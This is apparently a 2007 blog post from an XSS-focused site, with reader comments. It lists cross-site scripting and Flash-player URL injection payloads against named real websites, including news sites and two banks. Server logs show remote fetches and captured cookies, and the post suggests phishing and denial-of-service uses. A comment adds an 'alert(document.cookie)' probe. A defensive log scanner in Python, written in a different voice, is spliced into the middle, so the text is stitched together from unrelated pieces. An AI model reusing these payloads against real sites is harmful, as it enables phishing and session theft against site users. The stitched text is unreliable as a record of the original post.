XSS Worm : Cross Site Scripting & Web 2.0 Security

Application Vulnerability Information Portal

Zero Day Shockwave SWF Player Exploit with XSS Attack

Posted by xssworm on November 10th, 2007

Here we have some proof-of-concept demonstrations of XSS attacks and cross-Flash forgery on many sites.

We hope our readers will leave feedback on these serious vulnerabilities.

SWF Exploit 1.

We point the browser at the target Shockwave player:

http://alanakurtis.com/flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true

but on localhost we see:

Connect to [127.0.0.1] from localhost [127.0.0.1] 4131
GET /xssworm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

..

(-;

Perhaps a blackhat could use this for a denial of service against the server's users: host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=xssworm.com

The browser also shows:

http://www.moanmyip.com/player.swf?song_url=http://localhost/xssworm?seo&autoplay=true

but in the logger we see:

Connect to [127.0.0.1] from localhost [127.0.0.1] 3831
GET /xssworm?seo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

And on Metacafe we discover a Shockwave XSS 0-day that a blackhat could use to phish:

MetaCafe XSS Worm Vulnerability - 0-Day Shockwave Attack POC

Demo:

http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true&

We see this log output on xssworm.com:
GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
… snips…
Connection: keep-alive
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0
D2D[CE]; s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE000039DC|4726056DCE] s_vi
_wzvqcdsx7F7×60qx7isx7Fx7D=[CS]v4|473350E200004A7E-A000C800004398|473350E2[C
E]; s_vi_zox7Ekigx7Ex7De=[CS]v|47009D8E00027B7-A000B0400000F80|400A7C4[CE];
s_vi_kefx7Dhxxkdn=[CS]v4|4707E570000074C7-A1606500003648|47200DA4DB[CE]; s_vi_jd
ghjfxxliyo=[CS]v4|4726056E0000760-A00070BAE000039DC|4726056[CE]; svi_nyhylx7B89
x3E=[CS]v4|46FEC0DF0004AB3-A00B28000180|46FEC0D[CE]; s_vi_hfedldmx0×7B=[CS
]v4|4725839500005A8F-A160B1700007C|472605EC[CE]; s_vi_x7Dx6067zbhx7Dl=[CS]v4|4
6FEC0C4000077C6-A160B2100003DDF|4EC4EC0C4[CE]; s_vi_ox7Dyhex700Ffnoxx=[C]v4|4FEC0
BC00003E04-A000B000075F|46C0BBCE]; s_vi_pogx7F4k=[CS]v7208C000DB-A
290B5A000015EB|47208C61[CE]; s_vi_igdx7Fxxiae=[CS]v4|47225ED8000044DD-A140A36000
02900|47225ED7[CE]; s_vi_brcxxaabctrxxatkppc=[CS]v4|4709002200006037-A290A9D0000
6E2E|4717A488[CE]; s_vi_kefx7Dhndfyx7B=[CS]v4|470EE04300002808-A140A2500000049|4
70EE043[CE]; s_vi_chsts003DBF|4734B658[CE]; s_vi_svx7Cywxxdsux7Edbuqe=[CS]v4|47351D–

snips…

We see many more serious vulnerabilities in Web 2.0 today.

Hacker browses: http://www.liveleak.com/player.swf?song_url=http://localhost/hurr&autoplay=true

In the server log:

connect to [127.0.0.1] from localhost [127.0.0.1] 1268
GET /urchin.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;)
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveleak.com/

(;

Please leave nice XSS comments.
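Every demo above follows the same pattern: a site's embedded SWF player takes a URL in a query parameter (song_url, mediaURL, xmlsrc, applicationxml) and fetches it from wherever it points, and the Fox search page reflects raw markup. The script below is an added example, not code from this post or from any of the sites named in it: it scans access-log request lines for player parameters carrying a foreign-host URL or HTML markup, and shows a server-side guard that only lets same-origin media paths through. The log lines are constructed for the example, the log format and `site_host` value are assumptions, and the parameter names come from the URLs in the post.

```python
"""Detect remote-URL / markup injection in Flash player query strings, and guard against it."""
import re
from urllib.parse import urlsplit, parse_qs

# Request-line pattern for a combined-format access log (assumed format for this example).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
# HTML tag openers such as <h1>, </a>, <script ...>, plus javascript: URLs.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-zA-Z]|javascript\s*:', re.IGNORECASE)
# Schemes a Flash player would actually fetch from.
FETCH_SCHEMES = {"http", "https", "ftp"}

# Constructed sample log lines, modelled on the requests shown in the post (not real logs).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Nov/2007:12:00:01 +0000] "GET /flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true HTTP/1.1" 200 512
10.0.0.5 - - [10/Nov/2007:12:00:02 +0000] "GET /flash/musicplayer.swf?song_url=/media/song1.mp3&autoplay=true HTTP/1.1" 200 512
10.0.0.7 - - [10/Nov/2007:12:00:03 +0000] "GET /f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish HTTP/1.1" 200 1024
10.0.0.9 - - [10/Nov/2007:12:00:04 +0000] "GET /myfox/pages/Home/SearchResult?qt=%22%3E%3Ch1%3E%3Ca%20href=%22//xssworm.com%22%3EXSS%3C/a%3E%3C/h1%3E HTTP/1.1" 200 2048
"""


def foreign_url_host(value, site_host):
    """Return the host if `value` is an absolute or scheme-relative URL to another host, else None."""
    try:
        parts = urlsplit(value.strip())
    except ValueError:  # malformed netloc (e.g. stray '[')
        return None
    if parts.scheme and parts.scheme.lower() not in FETCH_SCHEMES:
        return None
    host = parts.hostname  # strips userinfo and port, so user@evil.com tricks do not pass
    if not host or host.lower() == site_host.lower():
        return None
    return host


def scan_target(target, site_host):
    """Inspect every query parameter of one request target; return (kind, param, detail) tuples."""
    findings = []
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:  # parse_qs has already percent-decoded the value
            host = foreign_url_host(value, site_host)
            if host:
                findings.append(("remote_url", name, host))
            if MARKUP_RE.search(value):
                findings.append(("markup", name, value[:40]))
    return findings


def scan_log(text, site_host):
    """Run scan_target over each request line of an access log; return a list of finding dicts."""
    results = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for kind, param, detail in scan_target(m.group("target"), site_host):
            results.append({"line": lineno, "kind": kind, "param": param, "detail": detail})
    return results


def safe_media_url(value, site_host):
    """Server-side guard for a player's media parameter.

    Accepts only same-origin, absolute-path media (no foreign host, no scheme-relative URL,
    no markup, no '..' segments, and not another .swf, which is what the recursive
    self-loading URL in the post relies on). Returns the normalised path or None.
    """
    if MARKUP_RE.search(value) or any(c in value for c in '<>"\''):
        return None
    try:
        parts = urlsplit(value.strip())
    except ValueError:
        return None
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return None
    if parts.hostname and parts.hostname.lower() != site_host.lower():
        return None
    path = parts.path
    if not path.startswith("/") or ".." in path.split("/") or path.lower().endswith(".swf"):
        return None
    return path + ("?" + parts.query if parts.query else "")


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG, "www.example.com"):
        print(finding)
```

Run against the constructed log, the scanner flags line 1 (song_url to localhost), line 3 (mediaURL to xssworm.com) and line 4 (markup in qt), and leaves the same-origin request on line 2 alone. The guard is the fix a site owner controls: the player's wrapper page resolves the media parameter through `safe_media_url` before writing it into the embed, so the SWF is never handed a foreign URL.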


8 Responses to “Zero Day Shockwave SWF Player Exploit with XSS Attack”

  1. vaj Says:

    Also at Fox

    http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE&%3Ch1%3E%3Ca%20href=//xssworm.com%3EXSS%20Worm%20Web%202.0%20Security%20Portal%3C/a%3E%3Cbr%3E%3C/h1%3EWith%20new%200day%20Fox%20News%20XSS%20Hacking%20Video!

  2. Facebook virus Says:

    not so good at these swf :(

    https://banking.cc-bank.de/media/flash/fondspreisticker/fondspreisticker.swf?xmlsrc=http://xssworm.com

  3. Facebook virus Says:

    also here as well banks :(

    http://www.charter-bank.com/paypass/images/demo_060126.swf?applicationxml=http://xssworm.com

  4. 0day XSS Says:

    More XSS on FOX:

    http://www.myfoxla.com/myfox/pages/Home/SearchResult?siteId=1003&pageId=1.1&searchLocation=site&qt=%22%3E%3Cbr%3E%3Cbr%3E%3Ch1%3E%3Ca%20href=%22//xssworm.com%22%3EXSS%20Security%20Information%3C/a%3E%3C/h1%3E%3Cbr%3Ehttp://XSSWORM.COM%3Cbr%3E%3Cspan

  5. Cgi Proxy Says:

    I enjoyed reading the Zero Day Shockwave SWF Player Exploit with XSS Attack post, although I did not think it was entirely the best approach … there are alternatives which would provide more positive results ..

  6. John Doe Says:

    73ae50e958e1c496b92e802056b135ed

  7. Daniel Says:

    I read a similar article, also named Zero Day Shockwave SWF Player Exploit with XSS Attack, and it was completely different. Personally, I agree with you more, because this article makes a little bit more sense to me.

  8. asdf Says:

    alert(document.cookie)
